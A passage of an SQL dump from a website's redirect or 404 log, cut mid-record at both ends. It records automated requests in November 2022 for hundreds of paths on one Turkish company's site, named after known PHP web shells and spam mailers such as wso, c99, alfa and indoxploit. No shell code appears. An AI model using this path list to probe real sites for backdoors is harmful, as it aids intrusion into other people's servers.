00:00:00',301),(30601,'http://3s-technologies.com.tr/en/wp-content/plugins/upspy/index.php',NULL,'','',6,0,'2022-11-13 06:39:07','0000-00-00 00:00:00',301),(30602,'http://3s-technologies.com.tr/en/webr00t.php',NULL,'','',2,0,'2022-11-13 06:39:08','0000-00-00 00:00:00',301),(30603,'http://3s-technologies.com.tr/en/class-wp-widget-archives.php',NULL,'','',4,0,'2022-11-13 06:39:09','0000-00-00 00:00:00',301),(30604,'http://3s-technologies.com.tr/en/ruzu6mit.php',NULL,'','',2,0,'2022-11-13 06:39:10','0000-00-00 00:00:00',301),(30605,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/minishell.php',NULL,'','',2,0,'2022-11-13 06:39:10','0000-00-00 00:00:00',301),(30606,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/alfashell.php',NULL,'','',4,0,'2022-11-13 06:39:11','0000-00-00 00:00:00',301),(30607,'http://3s-technologies.com.tr/en/wp-admin/maint/wso.php',NULL,'','',4,0,'2022-11-13 06:39:12','0000-00-00 00:00:00',301),(30608,'http://3s-technologies.com.tr/en/gif.php',NULL,'','',5,0,'2022-11-13 06:39:13','0000-00-00 00:00:00',301),(30609,'http://3s-technologies.com.tr/en/wp-god.php',NULL,'','',4,0,'2022-11-13 06:39:14','0000-00-00 00:00:00',301),(30610,'http://3s-technologies.com.tr/en/olx.php',NULL,'','',4,0,'2022-11-13 06:39:14','0000-00-00 00:00:00',301),(30611,'http://3s-technologies.com.tr/en/madspotshell.php',NULL,'','',4,0,'2022-11-13 06:39:15','0000-00-00 00:00:00',301),(30612,'http://3s-technologies.com.tr/en/shel.php',NULL,'','',3,0,'2022-11-13 06:39:16','0000-00-00 00:00:00',301),(30613,'http://3s-technologies.com.tr/en/ntaps.php',NULL,'','',2,0,'2022-11-13 06:39:16','0000-00-00 00:00:00',301),(30614,'http://3s-technologies.com.tr/en/fpebr.php',NULL,'','',2,0,'2022-11-13 06:39:17','0000-00-00 00:00:00',301),(30615,'http://3s-technologies.com.tr/en/fatal.php',NULL,'','',4,0,'2022-11-13 06:39:18','0000-00-00 00:00:00',301),(30616,'http://3s-technologies.com.tr/en/navir.php',NULL,'','',4,0,'2022-11-13 06:39:18','0000-00-00 00:00:00',301),(30617,'http://3s-technologies.com.tr/en/ninja.php',NULL,'','',19,0,'2022-11-13 06:39:19','0000-00-00 00:00:00',301),(30618,'http://3s-technologies.com.tr/en/sysadmin.php',NULL,'','',2,0,'2022-11-13 06:39:20','0000-00-00 00:00:00',301),(30619,'http://3s-technologies.com.tr/en/sym.php',NULL,'','',17,0,'2022-11-13 06:39:21','0000-00-00 00:00:00',301),(30620,'http://3s-technologies.com.tr/en/whmcs/downloads/dz.php',NULL,'','',2,0,'2022-11-13 06:39:22','0000-00-00 00:00:00',301),(30621,'http://3s-technologies.com.tr/en/asw.php',NULL,'','',2,0,'2022-11-13 06:39:23','0000-00-00 00:00:00',301),(30622,'http://3s-technologies.com.tr/en/zone.php?phpshell',NULL,'','',3,0,'2022-11-13 06:39:23','0000-00-00 00:00:00',301),(30623,'http://3s-technologies.com.tr/en/soz.php',NULL,'','',2,0,'2022-11-13 06:39:24','0000-00-00 00:00:00',301),(30624,'http://3s-technologies.com.tr/en/bn.php',NULL,'','',2,0,'2022-11-13 06:39:25','0000-00-00 00:00:00',301),(30625,'http://3s-technologies.com.tr/en/tmp/user.php',NULL,'','',2,0,'2022-11-13 06:39:26','0000-00-00 00:00:00',301),(30626,'http://3s-technologies.com.tr/en/images/sym403.php',NULL,'','',4,0,'2022-11-13 06:39:26','0000-00-00 00:00:00',301),(30627,'http://3s-technologies.com.tr/en/jembut.php',NULL,'','',2,0,'2022-11-13 06:39:27','0000-00-00 00:00:00',301),(30628,'http://3s-technologies.com.tr/en/b1n4ry.php',NULL,'','',2,0,'2022-11-13 06:39:28','0000-00-00 00:00:00',301),(30629,'http://3s-technologies.com.tr/en/mom.php',NULL,'','',2,0,'2022-11-13 06:39:28','0000-00-00 00:00:00',301),(30630,'http://3s-technologies.com.tr/en/jingan.php',NULL,'','',2,0,'2022-11-13 06:39:29','0000-00-00 00:00:00',301),(30631,'http://3s-technologies.com.tr/en/robots.php',NULL,'','',12,0,'2022-11-13 06:39:30','0000-00-00 00:00:00',301),(30632,'http://3s-technologies.com.tr/en/zone-h.php',NULL,'','',2,0,'2022-11-13 06:39:30','0000-00-00 00:00:00',301),(30633,'http://3s-technologies.com.tr/en/readme.php',NULL,'','',16,0,'2022-11-13 06:39:33','0000-00-00 00:00:00',301),(30634,'http://3s-technologies.com.tr/en/cw.php',NULL,'','',2,0,'2022-11-13 06:39:34','0000-00-00 00:00:00',301),(30635,'http://3s-technologies.com.tr/en/images/mar.php',NULL,'','',5,0,'2022-11-13 06:39:35','0000-00-00 00:00:00',301),(30636,'http://3s-technologies.com.tr/en/foxwso-full.php',NULL,'','',2,0,'2022-11-13 06:39:36','0000-00-00 00:00:00',301),(30637,'http://3s-technologies.com.tr/en/images/wp-init.php',NULL,'','',4,0,'2022-11-13 06:39:36','0000-00-00 00:00:00',301),(30638,'http://3s-technologies.com.tr/en/alfatesla.php',NULL,'','',2,0,'2022-11-13 06:39:38','0000-00-00 00:00:00',301),(30639,'http://3s-technologies.com.tr/en/tools.php',NULL,'','',2,0,'2022-11-13 06:39:38','0000-00-00 00:00:00',301),(30640,'http://3s-technologies.com.tr/en/tshop.php',NULL,'','',6,0,'2022-11-13 06:39:39','0000-00-00 00:00:00',301),(30641,'http://3s-technologies.com.tr/en/twins.php',NULL,'','',4,0,'2022-11-13 06:39:40','0000-00-00 00:00:00',301),(30642,'http://3s-technologies.com.tr/en/tesla.php',NULL,'','',6,0,'2022-11-13 06:39:40','0000-00-00 00:00:00',301),(30643,'http://3s-technologies.com.tr/en/system_log.php',NULL,'','',17,0,'2022-11-13 06:39:41','0000-00-00 00:00:00',301),(30644,'http://3s-technologies.com.tr/en/r0x.php',NULL,'','',2,0,'2022-11-13 06:39:42','0000-00-00 00:00:00',301),(30645,'http://3s-technologies.com.tr/en/pro.php',NULL,'','',2,0,'2022-11-13 06:39:42','0000-00-00 00:00:00',301),(30646,'http://3s-technologies.com.tr/en/alfa_data/wp-2019.php',NULL,'','',2,0,'2022-11-13 06:39:43','0000-00-00 00:00:00',301),(30647,'http://3s-technologies.com.tr/en/by.php',NULL,'','',15,0,'2022-11-13 06:39:44','0000-00-00 00:00:00',301),(30648,'http://3s-technologies.com.tr/en/wp-includes/leafmailer.php',NULL,'','',2,0,'2022-11-13 06:39:44','0000-00-00 00:00:00',301),(30649,'http://3s-technologies.com.tr/en/syhrnvhpze.php',NULL,'','',2,0,'2022-11-13 06:39:46','0000-00-00 00:00:00',301),(30650,'http://3s-technologies.com.tr/en/php-backdoor.php',NULL,'','',6,0,'2022-11-13 06:39:47','0000-00-00 00:00:00',301),(30651,'http://3s-technologies.com.tr/en/simple.php',NULL,'','',123,0,'2022-11-13 06:39:49','0000-00-00 00:00:00',301),(30652,'http://3s-technologies.com.tr/en/wpx.php',NULL,'','',5,0,'2022-11-13 06:39:50','0000-00-00 00:00:00',301),(30653,'http://3s-technologies.com.tr/en/wp-content/shadowx.php',NULL,'','',4,0,'2022-11-13 06:39:50','0000-00-00 00:00:00',301),(30654,'http://3s-technologies.com.tr/en/qly7i.php',NULL,'','',2,0,'2022-11-13 06:39:51','0000-00-00 00:00:00',301),(30655,'http://3s-technologies.com.tr/en/qb9sl.php',NULL,'','',2,0,'2022-11-13 06:39:52','0000-00-00 00:00:00',301),(30656,'http://3s-technologies.com.tr/en/sindex.php',NULL,'','',5,0,'2022-11-13 06:39:53','0000-00-00 00:00:00',301),(30657,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/upload.php',NULL,'','',4,0,'2022-11-13 06:39:54','0000-00-00 00:00:00',301),(30658,'http://3s-technologies.com.tr/en/good.php',NULL,'','',2,0,'2022-11-13 06:39:55','0000-00-00 00:00:00',301),(30659,'http://3s-technologies.com.tr/en/gaza.php',NULL,'','',4,0,'2022-11-13 06:39:57','0000-00-00 00:00:00',301),(30660,'http://3s-technologies.com.tr/en/gank.php',NULL,'','',2,0,'2022-11-13 06:39:58','0000-00-00 00:00:00',301),(30661,'http://3s-technologies.com.tr/en/wp-0.php',NULL,'','',4,0,'2022-11-13 06:39:58','0000-00-00 00:00:00',301),(30662,'http://3s-technologies.com.tr/en/saudishell.php',NULL,'','',2,0,'2022-11-13 06:40:00','0000-00-00 00:00:00',301),(30663,'http://3s-technologies.com.tr/en/cybershell.php',NULL,'','',4,0,'2022-11-13 06:40:01','0000-00-00 00:00:00',301),(30664,'http://3s-technologies.com.tr/en/wp-1.php',NULL,'','',4,0,'2022-11-13 06:40:02','0000-00-00 00:00:00',301),(30665,'http://3s-technologies.com.tr/en/rrrzlhymub.php',NULL,'','',2,0,'2022-11-13 06:40:03','0000-00-00 00:00:00',301),(30666,'http://3s-technologies.com.tr/en/images/wso.php',NULL,'','',57,0,'2022-11-13 06:40:03','0000-00-00 00:00:00',301),(30667,'http://3s-technologies.com.tr/en/post-data.php',NULL,'','',2,0,'2022-11-13 06:40:04','0000-00-00 00:00:00',301),(30668,'http://3s-technologies.com.tr/en/icomsium.php',NULL,'','',2,0,'2022-11-13 06:40:06','0000-00-00 00:00:00',301),(30669,'http://3s-technologies.com.tr/en/ye.php',NULL,'','',4,0,'2022-11-13 06:40:07','0000-00-00 00:00:00',301),(30670,'http://3s-technologies.com.tr/en/wp-includes/css/shadowx.php',NULL,'','',4,0,'2022-11-13 06:40:08','0000-00-00 00:00:00',301),(30671,'http://3s-technologies.com.tr/en/wp-content/plugins/three-column-screen-layout/db.php',NULL,'','',7,0,'2022-11-13 06:40:09','0000-00-00 00:00:00',301),(30672,'http://3s-technologies.com.tr/en/wp-admin/css/colors/maro.php',NULL,'','',5,0,'2022-11-13 06:40:10','0000-00-00 00:00:00',301),(30673,'http://3s-technologies.com.tr/en/wp-includes/mini.php',NULL,'','',12,0,'2022-11-13 06:40:10','0000-00-00 00:00:00',301),(30674,'http://3s-technologies.com.tr/en/wp-includes/mari.php',NULL,'','',5,0,'2022-11-13 06:40:11','0000-00-00 00:00:00',301),(30675,'http://3s-technologies.com.tr/en/ccx/index.php',NULL,'','',4,0,'2022-11-13 06:40:12','0000-00-00 00:00:00',301),(30676,'http://3s-technologies.com.tr/en/www.php',NULL,'','',37,0,'2022-11-13 06:40:12','0000-00-00 00:00:00',301),(30677,'http://3s-technologies.com.tr/en/wp-includes/alfa.php',NULL,'','',4,0,'2022-11-13 06:40:13','0000-00-00 00:00:00',301),(30678,'http://3s-technologies.com.tr/en/i3wfj.php',NULL,'','',2,0,'2022-11-13 06:40:14','0000-00-00 00:00:00',301),(30679,'http://3s-technologies.com.tr/en/wp-includes/lx.php',NULL,'','',2,0,'2022-11-13 06:40:14','0000-00-00 00:00:00',301),(30680,'http://3s-technologies.com.tr/en/madmailer.php',NULL,'','',4,0,'2022-11-13 06:40:15','0000-00-00 00:00:00',301),(30681,'http://3s-technologies.com.tr/en/f0x.php',NULL,'','',4,0,'2022-11-13 06:40:16','0000-00-00 00:00:00',301),(30682,'http://3s-technologies.com.tr/en/rg3v6.php',NULL,'','',2,0,'2022-11-13 06:40:16','0000-00-00 00:00:00',301),(30683,'http://3s-technologies.com.tr/en/wp-content/plugins/cekidot/mr.php',NULL,'','',4,0,'2022-11-13 06:40:17','0000-00-00 00:00:00',301),(30684,'http://3s-technologies.com.tr/en/x.phtml',NULL,'','',3,0,'2022-11-13 06:40:18','0000-00-00 00:00:00',301),(30685,'http://3s-technologies.com.tr/en/romfc.php',NULL,'','',2,0,'2022-11-13 06:40:18','0000-00-00 00:00:00',301),(30686,'http://3s-technologies.com.tr/en/reset.php',NULL,'','',2,0,'2022-11-13 06:40:19','0000-00-00 00:00:00',301),(30687,'http://3s-technologies.com.tr/en/ico.php',NULL,'','',2,0,'2022-11-13 06:40:20','0000-00-00 00:00:00',301),(30688,'http://3s-technologies.com.tr/en/ix.php',NULL,'','',2,0,'2022-11-13 06:40:21','0000-00-00 00:00:00',301),(30689,'http://3s-technologies.com.tr/en/chitoge.php',NULL,'','',4,0,'2022-11-13 06:40:21','0000-00-00 00:00:00',301),(30690,'http://3s-technologies.com.tr/en/00.php',NULL,'','',2,0,'2022-11-13 06:40:22','0000-00-00 00:00:00',301),(30691,'http://3s-technologies.com.tr/en/tersembunyi.php',NULL,'','',4,0,'2022-11-13 06:40:23','0000-00-00 00:00:00',301),(30692,'http://3s-technologies.com.tr/en/wp-sid.php',NULL,'','',2,0,'2022-11-13 06:40:24','0000-00-00 00:00:00',301),(30693,'http://3s-technologies.com.tr/en/wp-includes/css/f0x.php',NULL,'','',2,0,'2022-11-13 06:40:25','0000-00-00 00:00:00',301),(30694,'http://3s-technologies.com.tr/en/fresh.php',NULL,'','',2,0,'2022-11-13 06:40:25','0000-00-00 00:00:00',301),(30695,'http://3s-technologies.com.tr/en/database.php',NULL,'','',5,0,'2022-11-13 06:40:26','0000-00-00 00:00:00',301),(30696,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/mini.local.php',NULL,'','',4,0,'2022-11-13 06:40:27','0000-00-00 00:00:00',301),(30697,'http://3s-technologies.com.tr/en/gxsyuzkutr.php',NULL,'','',2,0,'2022-11-13 06:40:27','0000-00-00 00:00:00',301),(30698,'http://3s-technologies.com.tr/en/wpindex.php',NULL,'','',15,0,'2022-11-13 06:40:29','0000-00-00 00:00:00',301),(30699,'http://3s-technologies.com.tr/en/wso1337.php',NULL,'','',6,0,'2022-11-13 06:40:29','0000-00-00 00:00:00',301),(30700,'http://3s-technologies.com.tr/en/templates/beez/index.php',NULL,'','',5,0,'2022-11-13 06:40:30','0000-00-00 00:00:00',301),(30701,'http://3s-technologies.com.tr/en/wp-raze.php',NULL,'','',4,0,'2022-11-13 06:40:31','0000-00-00 00:00:00',301),(30702,'http://3s-technologies.com.tr/en/wp-init.php',NULL,'','',4,0,'2022-11-13 06:40:32','0000-00-00 00:00:00',301),(30703,'http://3s-technologies.com.tr/en/wacking.php',NULL,'','',4,0,'2022-11-13 06:40:33','0000-00-00 00:00:00',301),(30704,'http://3s-technologies.com.tr/en/russian.php',NULL,'','',4,0,'2022-11-13 06:40:34','0000-00-00 00:00:00',301),(30705,'http://3s-technologies.com.tr/en/ubh.php',NULL,'','',4,0,'2022-11-13 06:40:34','0000-00-00 00:00:00',301),(30706,'http://3s-technologies.com.tr/en/wp-admin/maint/upl.php',NULL,'','',4,0,'2022-11-13 06:40:35','0000-00-00 00:00:00',301),(30707,'http://3s-technologies.com.tr/en/wp-includes/css/404.php',NULL,'','',4,0,'2022-11-13 06:40:35','0000-00-00 00:00:00',301),(30708,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/shellgo.php',NULL,'','',2,0,'2022-11-13 06:40:36','0000-00-00 00:00:00',301),(30709,'http://3s-technologies.com.tr/en/dz1.php',NULL,'','',2,0,'2022-11-13 06:40:37','0000-00-00 00:00:00',301),(30710,'http://3s-technologies.com.tr/en/tertykung.php',NULL,'','',2,0,'2022-11-13 06:40:38','0000-00-00 00:00:00',301),(30711,'http://3s-technologies.com.tr/en/tttt.php',NULL,'','',4,0,'2022-11-13 06:40:39','0000-00-00 00:00:00',301),(30712,'http://3s-technologies.com.tr/en/tuco.php',NULL,'','',16,0,'2022-11-13 06:40:40','0000-00-00 00:00:00',301),(30713,'http://3s-technologies.com.tr/en/wp-admin/jensq.php',NULL,'','',2,0,'2022-11-13 06:40:40','0000-00-00 00:00:00',301),(30714,'http://3s-technologies.com.tr/en/images/x.php',NULL,'','',4,0,'2022-11-13 06:40:41','0000-00-00 00:00:00',301),(30715,'http://3s-technologies.com.tr/en/zacosmall.php',NULL,'','',4,0,'2022-11-13 06:40:42','0000-00-00 00:00:00',301),(30716,'http://3s-technologies.com.tr/en/up1.php',NULL,'','',2,0,'2022-11-13 06:40:42','0000-00-00 00:00:00',301),(30717,'http://3s-technologies.com.tr/en/wp-admin/maint/maro.php',NULL,'','',4,0,'2022-11-13 06:40:43','0000-00-00 00:00:00',301),(30718,'http://3s-technologies.com.tr/en/wp-content/plugins/google-sitemap-generator/sitemap-core.php',NULL,'','',2,0,'2022-11-13 06:40:44','0000-00-00 00:00:00',301),(30719,'http://3s-technologies.com.tr/en/mini.php5',NULL,'','',2,0,'2022-11-13 06:40:44','0000-00-00 00:00:00',301),(30720,'http://3s-technologies.com.tr/en/wp-admin/css/maro.php',NULL,'','',5,0,'2022-11-13 06:40:45','0000-00-00 00:00:00',301),(30721,'http://3s-technologies.com.tr/en/images/bypass.php',NULL,'','',4,0,'2022-11-13 06:40:46','0000-00-00 00:00:00',301),(30722,'http://3s-technologies.com.tr/en/lf.php',NULL,'','',5,0,'2022-11-13 06:40:46','0000-00-00 00:00:00',301),(30723,'http://3s-technologies.com.tr/en/marvins.php',NULL,'','',5,0,'2022-11-13 06:40:47','0000-00-00 00:00:00',301),(30724,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/alfa.php',NULL,'','',4,0,'2022-11-13 06:40:49','0000-00-00 00:00:00',301),(30725,'http://3s-technologies.com.tr/en/egy.php',NULL,'','',4,0,'2022-11-13 06:40:50','0000-00-00 00:00:00',301),(30726,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/leaf.php',NULL,'','',2,0,'2022-11-13 06:40:51','0000-00-00 00:00:00',301),(30727,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/mari.php',NULL,'','',5,0,'2022-11-13 06:40:51','0000-00-00 00:00:00',301),(30728,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/mini.php',NULL,'','',4,0,'2022-11-13 06:40:52','0000-00-00 00:00:00',301),(30729,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/xxxx.php',NULL,'','',4,0,'2022-11-13 06:40:53','0000-00-00 00:00:00',301),(30730,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/maro.php',NULL,'','',4,0,'2022-11-13 06:40:53','0000-00-00 00:00:00',301),(30731,'http://3s-technologies.com.tr/en/wp-admin/css/langar.php',NULL,'','',4,0,'2022-11-13 06:40:55','0000-00-00 00:00:00',301),(30732,'http://3s-technologies.com.tr/en/gator.php',NULL,'','',2,0,'2022-11-13 06:40:56','0000-00-00 00:00:00',301),(30733,'http://3s-technologies.com.tr/en/wp-we.php',NULL,'','',4,0,'2022-11-13 06:40:56','0000-00-00 00:00:00',301),(30734,'http://3s-technologies.com.tr/en/whmcs.php',NULL,'','',4,0,'2022-11-13 06:40:57','0000-00-00 00:00:00',301),(30735,'http://3s-technologies.com.tr/en/gel4y.php',NULL,'','',54,0,'2022-11-13 06:40:58','0000-00-00 00:00:00',301),(30736,'http://3s-technologies.com.tr/en/gelay.php',NULL,'','',49,0,'2022-11-13 06:40:58','0000-00-00 00:00:00',301),(30737,'http://3s-technologies.com.tr/en/zk.php',NULL,'','',13,0,'2022-11-13 06:41:00','0000-00-00 00:00:00',301),(30738,'http://3s-technologies.com.tr/en/ohayo.php',NULL,'','',5,0,'2022-11-13 06:41:00','0000-00-00 00:00:00',301),(30739,'http://3s-technologies.com.tr/en/we1y8.php',NULL,'','',2,0,'2022-11-13 06:41:01','0000-00-00 00:00:00',301),(30740,'http://3s-technologies.com.tr/en/wp-db.php',NULL,'','',2,0,'2022-11-13 06:41:02','0000-00-00 00:00:00',301),(30741,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/c99.php',NULL,'','',2,0,'2022-11-13 06:41:02','0000-00-00 00:00:00',301),(30742,'http://3s-technologies.com.tr/en/init.php',NULL,'','',18,0,'2022-11-13 06:41:04','0000-00-00 00:00:00',301),(30743,'http://3s-technologies.com.tr/en/indexx.php',NULL,'','',4,0,'2022-11-13 06:41:04','0000-00-00 00:00:00',301),(30744,'http://3s-technologies.com.tr/en/index3.php',NULL,'','',5,0,'2022-11-13 06:41:05','0000-00-00 00:00:00',301),(30745,'http://3s-technologies.com.tr/en/index4.php',NULL,'','',5,0,'2022-11-13 06:41:06','0000-00-00 00:00:00',301),(30746,'http://3s-technologies.com.tr/en/index5.php',NULL,'','',4,0,'2022-11-13 06:41:07','0000-00-00 00:00:00',301),(30747,'http://3s-technologies.com.tr/en/index6.php',NULL,'','',4,0,'2022-11-13 06:41:07','0000-00-00 00:00:00',301),(30748,'http://3s-technologies.com.tr/en/index7.php',NULL,'','',4,0,'2022-11-13 06:41:08','0000-00-00 00:00:00',301),(30749,'http://3s-technologies.com.tr/en/index8.php',NULL,'','',4,0,'2022-11-13 06:41:09','0000-00-00 00:00:00',301),(30750,'http://3s-technologies.com.tr/en/index9.php',NULL,'','',4,0,'2022-11-13 06:41:09','0000-00-00 00:00:00',301),(30751,'http://3s-technologies.com.tr/en/index1.php',NULL,'','',5,0,'2022-11-13 06:41:10','0000-00-00 00:00:00',301),(30752,'http://3s-technologies.com.tr/en/admin1.php',NULL,'','',4,0,'2022-11-13 06:41:11','0000-00-00 00:00:00',301),(30753,'http://3s-technologies.com.tr/en/wp-admin/mdsa9.php',NULL,'','',2,0,'2022-11-13 06:41:11','0000-00-00 00:00:00',301),(30754,'http://3s-technologies.com.tr/en/deleteme.chajbbh2.php',NULL,'','',2,0,'2022-11-13 06:41:12','0000-00-00 00:00:00',301),(30755,'http://3s-technologies.com.tr/en/indoxploit.php',NULL,'','',19,0,'2022-11-13 06:41:14','0000-00-00 00:00:00',301),(30756,'http://3s-technologies.com.tr/en/wp-content/foxs1sx.php',NULL,'','',2,0,'2022-11-13 06:41:16','0000-00-00 00:00:00',301),(30757,'http://3s-technologies.com.tr/en/degeselih.php',NULL,'','',2,0,'2022-11-13 06:41:17','0000-00-00 00:00:00',301),(30758,'http://3s-technologies.com.tr/en/simple-upload.php',NULL,'','',4,0,'2022-11-13 06:41:18','0000-00-00 00:00:00',301),(30759,'http://3s-technologies.com.tr/en/wp-includes/z.php',NULL,'','',4,0,'2022-11-13 06:41:19','0000-00-00 00:00:00',301),(30760,'http://3s-technologies.com.tr/en/jtbknjjpvc.php',NULL,'','',2,0,'2022-11-13 06:41:20','0000-00-00 00:00:00',301),(30761,'http://3s-technologies.com.tr/en/ksa.php',NULL,'','',4,0,'2022-11-13 06:41:20','0000-00-00 00:00:00',301),(30762,'http://3s-technologies.com.tr/en/cyberwarrior.php',NULL,'','',2,0,'2022-11-13 06:41:22','0000-00-00 00:00:00',301),(30763,'http://3s-technologies.com.tr/en/leaf_mailer.php',NULL,'','',3,0,'2022-11-13 06:41:22','0000-00-00 00:00:00',301),(30764,'http://3s-technologies.com.tr/en/wp-content/plugins/ubh/con.php',NULL,'','',4,0,'2022-11-13 06:41:23','0000-00-00 00:00:00',301),(30765,'http://3s-technologies.com.tr/en/.dha.php',NULL,'','',2,0,'2022-11-13 06:41:24','0000-00-00 00:00:00',301),(30766,'http://3s-technologies.com.tr/en/.yoi.php',NULL,'','',2,0,'2022-11-13 06:41:25','0000-00-00 00:00:00',301),(30767,'http://3s-technologies.com.tr/en/wp-conflg.php',NULL,'','',58,0,'2022-11-13 06:41:25','0000-00-00 00:00:00',301),(30768,'http://3s-technologies.com.tr/en/.alf.php',NULL,'','',9,0,'2022-11-13 06:41:26','0000-00-00 00:00:00',301),(30769,'http://3s-technologies.com.tr/en/server.php',NULL,'','',46,0,'2022-11-13 06:41:27','0000-00-00 00:00:00',301),(30770,'http://3s-technologies.com.tr/en/wso-latest.php',NULL,'','',4,0,'2022-11-13 06:41:27','0000-00-00 00:00:00',301),(30771,'http://3s-technologies.com.tr/en/wp-admin/ugeaz.php',NULL,'','',2,0,'2022-11-13 06:41:28','0000-00-00 00:00:00',301),(30772,'http://3s-technologies.com.tr/en/wp-inlcudes.php?katib',NULL,'','',3,0,'2022-11-13 06:41:29','0000-00-00 00:00:00',301),(30773,'http://3s-technologies.com.tr/en/wp-content/ak.php',NULL,'','',2,0,'2022-11-13 06:41:30','0000-00-00 00:00:00',301),(30774,'http://3s-technologies.com.tr/en/unziperpoe.php',NULL,'','',2,0,'2022-11-13 06:41:30','0000-00-00 00:00:00',301),(30775,'http://3s-technologies.com.tr/en/r00t.php',NULL,'','',15,0,'2022-11-13 06:41:32','0000-00-00 00:00:00',301),(30776,'http://3s-technologies.com.tr/en/wp-includes/css/gelay.php',NULL,'','',4,0,'2022-11-13 06:41:33','0000-00-00 00:00:00',301),(30777,'http://3s-technologies.com.tr/en/zaco.php',NULL,'','',4,0,'2022-11-13 06:41:34','0000-00-00 00:00:00',301),(30778,'http://3s-technologies.com.tr/en/base.php',NULL,'','',13,0,'2022-11-13 06:41:34','0000-00-00 00:00:00',301),(30779,'http://3s-technologies.com.tr/en/batm.php',NULL,'','',13,0,'2022-11-13 06:41:35','0000-00-00 00:00:00',301),(30780,'http://3s-technologies.com.tr/en/byps.php',NULL,'','',15,0,'2022-11-13 06:41:36','0000-00-00 00:00:00',301),(30781,'http://3s-technologies.com.tr/en/jmbt.php',NULL,'','',2,0,'2022-11-13 06:41:37','0000-00-00 00:00:00',301),(30782,'http://3s-technologies.com.tr/en/lol.php',NULL,'','',18,0,'2022-11-13 06:41:38','0000-00-00 00:00:00',301),(30783,'http://3s-technologies.com.tr/en/useri.php',NULL,'','',2,0,'2022-11-13 06:41:38','0000-00-00 00:00:00',301),(30784,'http://3s-technologies.com.tr/en/exp.php',NULL,'','',4,0,'2022-11-13 06:41:39','0000-00-00 00:00:00',301),(30785,'http://3s-technologies.com.tr/en/tai.php',NULL,'','',2,0,'2022-11-13 06:41:40','0000-00-00 00:00:00',301),(30786,'http://3s-technologies.com.tr/en/shell.phtml',NULL,'','',3,0,'2022-11-13 06:41:41','0000-00-00 00:00:00',301),(30787,'http://3s-technologies.com.tr/en/chan.php',NULL,'','',2,0,'2022-11-13 06:41:41','0000-00-00 00:00:00',301),(30788,'http://3s-technologies.com.tr/en/cakt.php',NULL,'','',2,0,'2022-11-13 06:41:42','0000-00-00 00:00:00',301),(30789,'http://3s-technologies.com.tr/en/wp-content/f0x.php',NULL,'','',5,0,'2022-11-13 06:41:43','0000-00-00 00:00:00',301),(30790,'http://3s-technologies.com.tr/en/wp-admin/css/upl.php',NULL,'','',4,0,'2022-11-13 06:41:44','0000-00-00 00:00:00',301),(30791,'http://3s-technologies.com.tr/en/wp-installer.php',NULL,'','',2,0,'2022-11-13 06:41:45','0000-00-00 00:00:00',301),(30792,'http://3s-technologies.com.tr/en/ex.php',NULL,'','',2,0,'2022-11-13 06:41:46','0000-00-00 00:00:00',301),(30793,'http://3s-technologies.com.tr/en/shell.php5',NULL,'','',2,0,'2022-11-13 06:41:47','0000-00-00 00:00:00',301),(30794,'http://3s-technologies.com.tr/en/ex0shell.php',NULL,'','',4,0,'2022-11-13 06:41:47','0000-00-00 00:00:00',301),(30795,'http://3s-technologies.com.tr/en/egyshell.php',NULL,'','',2,0,'2022-11-13 06:41:48','0000-00-00 00:00:00',301),(30796,'http://3s-technologies.com.tr/en/v3.php',NULL,'','',29,0,'2022-11-13 06:41:49','0000-00-00 00:00:00',301),(30797,'http://3s-technologies.com.tr/en/dz.php',NULL,'','',8,0,'2022-11-13 06:41:49','0000-00-00 00:00:00',301),(30798,'http://3s-technologies.com.tr/en/crypted.php',NULL,'','',3,0,'2022-11-13 06:41:51','0000-00-00 00:00:00',301),(30799,'http://3s-technologies.com.tr/en/wp-admin/css/leafmailer.php.php',NULL,'','',2,0,'2022-11-13 06:41:51','0000-00-00 00:00:00',301),(30800,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/xxx.php',NULL,'','',4,0,'2022-11-13 06:41:52','0000-00-00 00:00:00',301),(30801,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/out.php',NULL,'','',4,0,'2022-11-13 06:41:53','0000-00-00 00:00:00',301),(30802,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/ups.php',NULL,'','',4,0,'2022-11-13 06:41:53','0000-00-00 00:00:00',301),(30803,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/upl.php',NULL,'','',4,0,'2022-11-13 06:41:54','0000-00-00 00:00:00',301),(30804,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/404.php',NULL,'','',4,0,'2022-11-13 06:41:55','0000-00-00 00:00:00',301),(30805,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/wso.php',NULL,'','',4,0,'2022-11-13 06:41:56','0000-00-00 00:00:00',301),(30806,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/fox.phpfox.php',NULL,'','',2,0,'2022-11-13 06:41:56','0000-00-00 00:00:00',301),(30807,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/c99.php',NULL,'','',4,0,'2022-11-13 06:41:58','0000-00-00 00:00:00',301),(30808,'http://3s-technologies.com.tr/en/wp-content/plugins/xichang/x.php?xi',NULL,'','',2,0,'2022-11-13 06:41:58','0000-00-00 00:00:00',301),(30809,'http://3s-technologies.com.tr/en/codeboy1877x.php',NULL,'','',4,0,'2022-11-13 06:42:00','0000-00-00 00:00:00',301),(30810,'http://3s-technologies.com.tr/en/wp-title.php',NULL,'','',15,0,'2022-11-13 06:42:00','0000-00-00 00:00:00',301),(30811,'http://3s-technologies.com.tr/en/73.php',NULL,'','',15,0,'2022-11-13 06:42:01','0000-00-00 00:00:00',301),(30812,'http://3s-technologies.com.tr/en/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',2,0,'2022-11-13 06:42:02','0000-00-00 00:00:00',301),(30813,'http://3s-technologies.com.tr/en/webroot.php',NULL,'','',2,0,'2022-11-13 06:42:02','0000-00-00 